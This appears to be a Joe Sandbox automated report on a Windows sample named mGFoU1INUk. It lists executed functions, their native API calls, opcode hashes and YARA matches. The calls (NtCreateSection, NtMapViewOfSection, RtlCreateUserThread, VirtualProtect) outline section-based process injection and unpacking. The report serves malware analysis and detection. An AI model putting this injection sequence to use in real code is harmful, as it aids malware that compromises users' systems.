Snapshot File: hcaresult_0_2_40b000_mGFoU1INUk.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
String ID: k`$}$
API String ID: 2545807588-956986773
Opcode ID: 89f702b1397d06244922e5fd887acc024e0239ca569067a159a5991e14586c5a
Instruction ID: af97c55d7550fca7481f4020956f7819bfbd285186e11878fc050d44ae633f67
Opcode Fuzzy Hash: 89f702b1397d06244922e5fd887acc024e0239ca569067a159a5991e14586c5a
Instruction Fuzzy Hash: 9CA1E371802A24DBC720DB65EC48ADB7F79FF89351F41406AF50AA7150DB385A81CFAD

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02C4A58F Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C4A5B7
Module32First.KERNEL32(00000000,00000224), ref: 02C4A5D7

Memory Dump Source

Source File: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c47000_mGFoU1INUk.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 371ae48abfb3b3b5f63eb2215592bd4d61066d1d862d4d4d888ba815970b7925
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: B5F09632240B117FD7203BF5AE9CBAF76E8AF89625F100529EA47D24C0DF70E9454A61

Function 02FC003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02FC024D

Strings

kernel32.dll, xrefs: 02FC008F, 02FC0095
cess, xrefs: 02FC018D

Memory Dump Source

Source File: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fc0000_mGFoU1INUk.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 610401f59bd3e033c332991e216635eec9ee6a516276f39422bb654a80fc4d1b
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 97525975A01229DFDB64CF58C984BACBBB1BF09304F1480E9E94DAB351DB30AA95DF14

Function 00415820 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158FF
GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 0041593C
VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041595B

Strings

, xrefs: 00415865

Memory Dump Source

Source File: 00000000.00000002.2143598298.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_mGFoU1INUk.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

Function 02FC0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02FC0223,?,?), ref: 02FC0E19
SetErrorMode.KERNELBASE(00000000,?,?,02FC0223,?,?), ref: 02FC0E1E

Memory Dump Source

Source File: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fc0000_mGFoU1INUk.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ecccb221eca8afc39b238fc6a573dbfafbac2534b4061c7d54fb180911970f8b
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 4AD01231545129B7D7003A94DC09BCD7B1CDF05BA6F108011FB0DD9080CB70954146E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02C4A24E Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C4A29F

Memory Dump Source

Source File: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c47000_mGFoU1INUk.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 886736dfa0f72b65cc467638cf51833ebde7ab18f40d4974699cdd67b27aeaec
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 3C113C79A40208EFDB01DF98C995E99BBF5AF08351F158094F9489B362D771EA50EF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 004157F0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B18CE4,00415E8B), ref: 004157F8

Memory Dump Source

Source File: 00000000.00000002.2143598298.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_mGFoU1INUk.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14

Non-executed Functions

Function 02FC092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 02FC09DC, 02FC09DF, 02FC09E4
., xrefs: 02FC095F
l, xrefs: 02FC0966

Memory Dump Source

Source File: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fc0000_mGFoU1INUk.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 8ff8b4bf2f8a73bf94ee3b62b2d3bd9cbce14d2bfb2d03d8720fd332c02ab9fb
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: BA3137B690060ADFDB14CF99C980BAEBBF9FB48364F24404ED541A7710DB71EA45CBA4

Function 00403277 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c6c29104785b404ee1587310faf7a58f985fc96c36e4a0f0ab47a9eb8818183
Instruction ID: fe5d022e5c5052bbf0faad43917780fc708419ff1cff70b8a02db4b5679634ad
Opcode Fuzzy Hash: 5c6c29104785b404ee1587310faf7a58f985fc96c36e4a0f0ab47a9eb8818183
Instruction Fuzzy Hash: AC4158A5D1D2834FEB530A3018960A27FBCA96335371842FFC441EA5C7E23C1B07925A

Function 0040324F Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
Instruction ID: 47d85a717b2f9eb1e037dbaf55b436ab29ce309417f93d286f8d159decdfda18
Opcode Fuzzy Hash: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
Instruction Fuzzy Hash: 681101A1D1D2829BDF5B1E2108655767F6C6E7331772800FFD042BA2D2E23D5B02A26F

Function 00403256 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
Instruction ID: 44dbed29d4116881d315b966fbacf1cf40a73d3247e8d5490da27da81908206f
Opcode Fuzzy Hash: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
Instruction Fuzzy Hash: 091120A1D1C2825BDF9B1E204C645B27F6C6A7332371800FFE402BA2D6E23D1B03925E

Function 00403247 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
Instruction ID: 6cc5313a22b02943346cb09be328e63b116041f9455492dba296d6b6c8d47a80
Opcode Fuzzy Hash: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
Instruction Fuzzy Hash: 0111E0A1C1D2829BDF5A2E2108648767F6C6A7731772800FFD042FA2D6E23D5B03A15F

Function 0040326C Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
Instruction ID: 83c2e45a663ff97a83121d71df7fde14c7d1be506299b7fe0adcc4aca9f65d16
Opcode Fuzzy Hash: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
Instruction Fuzzy Hash: 3211CBA1C1D2825BDFAA1E2108544B67F6CAA7771771400FFD402BA2D6E23D5B02929E

Function 02C49E6C Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c47000_mGFoU1INUk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 3e8cd0e719afba6806f67d4c44f928eea7c86e3216d77bb88975499482157003
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 15118E72340210AFDB44DF55DD90EA773EAEB89324B198065ED04CB311DA75E842CB60

Function 00403290 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
Instruction ID: 18a3bc8234d562e7f0c7d25340e1ec3d72d942eb246f5034c2dedc7c4f371e85
Opcode Fuzzy Hash: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
Instruction Fuzzy Hash: 3611E191D1C2820BDFA62E2048545B67F6C5A7335771840FFD401F62D6F13D1F02825A

Function 02FC0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false

Joe Sandbox IDA Plugin

